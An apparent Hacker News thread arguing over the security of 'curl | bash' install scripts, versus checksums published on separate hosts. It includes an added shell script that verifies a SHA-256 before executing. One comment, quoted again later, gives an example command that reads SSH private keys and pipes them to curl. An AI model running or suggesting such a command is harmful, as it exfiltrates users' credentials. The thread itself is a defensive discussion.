top | item 32445248


aspaceman | 3 years ago

"A bunch of folks do something insecure" does not make an argument.

The argument is that it is insecure. Most easily because I can inject "cat ~/.ssh/*_rsa | curl ..." and get your company SSH keys. There's no reason Rust, brew and all the rest can't provide a Download page with a checksum. They choose not to, like this project chose not to, because it doesn't look as sexy.

It's really silly.


lillecarl | 3 years ago

Sure you can, but there's always going to be trust somewhere. I trust that the curl | bash examples I see are from reputable sources, and I trust their infra as much as someone else's to be safe (HTTPS protects against MITM attacks). NixOS is a cool example of complete package transparency with their binary cache: if your expressions don't evaluate the same as theirs, you'll build from source.

But really, curl | bash isn't the end of the world.

If they do it against a GitHub URL, you also have the security of GitHub behind you, because you can't differentiate on user agent there, which seems to be the commonly argued pitfall. Or other ways to detect you're not a browser; on a hosted platform you have someone else's security team behind your back.

qbasic_forever | 3 years ago

If someone has pulled off a sophisticated enough attack to intercept your HTTP curl of the script and inject a malicious version, why can't they also intercept your browser HTTP requests for the download page and inject different HTML that gives a good hash/checksum of the malicious script?

Going even further, what is stopping a malicious attack on the package source itself, like someone gaining control of the package source and committing a malicious version (as npm, PyPI and other registries have seen)?

The point is, "use your package manager" is not any better in the grand scheme of things than blindly curling and executing a script. Neither option is perfectly secure.

nine_k | 3 years ago

No, the concern is not that your computer is compromised. Yours is a low-value target, sorry.

It's their HTTP server, or a machine that feeds that HTTP server, which is a good target for a compromise. Injecting a little bit of malicious code that steals something, or installs a fileless piece of malware, would bring massive benefits to the perpetrator, even if the exploit is short-lived.

That shell script should be a zip (gzip, xz) file, with a SHA-256 hash of it published on a different, separately hosted resource.

Maybe we should provide a utility that just does that in one command. It could even be a shell script...
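What such a one-command utility could look like, as an added example written for this page and not code from the thread or from any project mentioned in it. It assumes the script is served gzip-compressed from one URL and its SHA-256 is published as a plain text file on a second, separately hosted URL (both URLs are placeholders passed in by the caller); the demo at the bottom uses constructed local files so it runs offline. Note the limit of the scheme, which the thread also raises: the check defends against a compromise of the script host alone; it does nothing if the attacker also controls the host publishing the hash.

```shell
#!/bin/sh
# Added example, not from the thread: download a compressed install script,
# fetch its SHA-256 from a separately hosted URL, and execute only on a match.
set -eu

# Print the hex SHA-256 of a file (sha256sum on Linux, shasum on macOS/BSD).
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# verify_sha256 FILE EXPECTED -> 0 if the digest matches, 1 otherwise.
# EXPECTED may be a bare hex string or a "HASH  filename" line copied from a
# checksum file; only the first field is used and case is normalised. An
# empty expected value is treated as a mismatch, never as "skip the check".
verify_sha256() {
    expected=$(printf '%s' "$2" | awk '{print tolower($1)}')
    actual=$(sha256_of "$1")
    if [ -z "$expected" ] || [ "$actual" != "$expected" ]; then
        return 1
    fi
    return 0
}

# run_if_verified ARCHIVE EXPECTED -> decompress and execute the script only
# after the hash matches; on mismatch nothing is executed and 1 is returned.
run_if_verified() {
    if ! verify_sha256 "$1" "$2"; then
        echo "SHA-256 mismatch for $1; refusing to execute" >&2
        return 1
    fi
    gunzip -c "$1" | sh
}

# fetch_verify_run SCRIPT_URL CHECKSUM_URL -> the one-command wrapper.
# CHECKSUM_URL is assumed to live on a different host than SCRIPT_URL, so a
# compromise of the script host alone cannot also supply a matching hash.
fetch_verify_run() {
    workdir=$(mktemp -d)
    curl -fsSL "$1" -o "$workdir/install.sh.gz"
    expected=$(curl -fsSL "$2")
    if run_if_verified "$workdir/install.sh.gz" "$expected"; then
        rm -rf "$workdir"
        return 0
    fi
    rm -rf "$workdir"
    return 1
}

# Offline demo with constructed inputs: a harmless script, its real digest,
# and a tampered replacement that must be rejected.
demo() {
    d=$(mktemp -d)
    printf 'echo installed ok\n' > "$d/install.sh"
    gzip -c "$d/install.sh" > "$d/install.sh.gz"
    good=$(sha256_of "$d/install.sh.gz")
    run_if_verified "$d/install.sh.gz" "$good"
    # The script host is compromised: a different payload appears under the
    # same name, but the separately published hash no longer matches it.
    printf 'echo pwned\n' | gzip -c > "$d/install.sh.gz"
    if run_if_verified "$d/install.sh.gz" "$good" 2>/dev/null; then
        echo "BUG: tampered script executed" >&2
        rm -rf "$d"
        return 1
    fi
    rm -rf "$d"
    return 0
}

demo
```

Usage against real URLs would be `fetch_verify_run https://scripts.example/install.sh.gz https://hashes.example/install.sh.gz.sha256` (placeholder hosts). The point of the two functions being separate is that the verification step has no network dependency and can be audited on its own; the download step can be swapped for wget or a package fetch without touching the check.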

yunohn | 3 years ago

Why can’t the downloaded binary package do the exact same thing? Or do you decompile and go through those as well?

aspaceman | 3 years ago

It could, but I can trust that no individual stepped in the middle of that process.

I trust Rust to not put such a thing in their binary. I do not trust an arbitrary man in the middle, and it's trivial to modify a shell script.

Without a checksum, I can't ensure the binary I'm piping through the shell is the binary they posted and built. Anyone can step in, modify a few lines, and get access to a large part of my system. The barrier to entry to add such capability to arbitrary binaries is outrageously high.

moondev | 3 years ago

> Most easily because I can inject, "cat ~/.ssh/*_rsa | curl ..."

If you can inject that, breaking TLS, which secures everything on the internet, why can't you inject your own checksum on the "download page"?

zbird | 3 years ago

Checksums and the binaries can be stored in different places for redundancy.